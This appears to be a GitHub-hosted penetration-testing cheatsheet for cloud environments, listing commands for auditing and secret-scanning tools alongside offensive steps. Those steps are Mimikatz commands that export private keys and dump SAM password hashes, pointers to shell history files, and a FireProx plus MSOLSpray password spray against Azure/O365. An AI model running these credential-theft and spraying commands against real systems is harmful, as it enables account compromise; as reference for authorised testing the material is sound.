Skip to content

Latest commit

 

History

History
161 lines (106 loc) · 3.11 KB

OtherTools.md

File metadata and controls

161 lines (106 loc) · 3.11 KB

Other Useful Cloud Tools and Techniques Cheatsheet

By Beau Bullock (@dafthack)

ScoutSuite

Multi-cloud security auditing tool

https://github.com/nccgroup/ScoutSuite

Install ScoutSuite

sudo apt-get install virtualenv
git clone https://github.com/nccgroup/ScoutSuite
cd ScoutSuite
virtualenv –p python3 venv
source venv/bin/activate
pip install –r requirements.txt

To run as root

sudo apt-get install virtualenv
sudo su
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite

Scan AWS environment with ScoutSuite

python scout.py aws --profile=<aws profile name>

or if installed...

scout aws --profile=<aws profile name>

Cloud_Enum

Tool to search for public resources in AWS, Azure, and GCP

https://github.com/initstring/cloud_enum

python3 cloud_enum.py -k <name-to-search>

GitLeaks

Search repositories for secrets

https://github.com/zricethezav/gitleaks

Pull GitLeaks with Docker

sudo docker pull zricethezav/gitleaks

Print the help menu

sudo docker run --rm --name=gitleaks zricethezav/gitleaks --help

Use GitLeaks to search for secrets

sudo docker run --rm --name=gitleaks zricethezav/gitleaks -v -r <repo URL>

TruffleHog - https://github.com/dxa4481/truffleHog

Shhgit - https://github.com/eth0izzle/shhgit

Gitrob - https://github.com/michenriksen/gitrob

Mimikatz

Export Non-Exportable Private Keys From Web Server

mimikatz# crypto::capi
mimikatz# privilege::debug
mimikatz# crypto::cng
mimikatz# crypto::certificates /systemstore:local_machine /store:my /export

Dump passwords hashes from SAM/SYSTEM files

mimikatz# lsadump::sam /system:SYSTEM /sam:SAM

Check Command History

Linux Bash History Location

~/.bash_history

Windows PowerShell PSReadLine Location

%USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PowerView

https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon Find on-prem ADConnect account name and server

Get-NetUser -Filter "(samAccountName=MSOL_*)" |Select-Object name,description | fl

FireProx

Password Spraying Azure/O365 while randomizing IPs with FireProx

Install

git clone https://github.com/ustayready/fireprox
cd fireprox
virtualenv -p python3 .
source bin/activate
pip install -r requirements.txt
python fire.py

Launch FireProx

python fire.py --access_key <access_key_id> --secret_access_key <secret_access_key> --region <region> --url https://login.microsoft.com --command create

Password spray using FireProx + MSOLSpray

Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020 -URL https://api-gateway-endpoint-id.execute-api.us-east-1.amazonaws.com/fireprox

ip2Provider

Check a list of IP addresses against cloud provider IP space

https://github.com/oldrho/ip2provider

Vulnerable Infrastructure Creation

Cloudgoat - https://github.com/RhinoSecurityLabs/cloudgoat

SadCloud - https://github.com/nccgroup/sadcloud

Flaws Cloud - http://flaws.cloud

Thunder CTF - http://thunder-ctf.cloud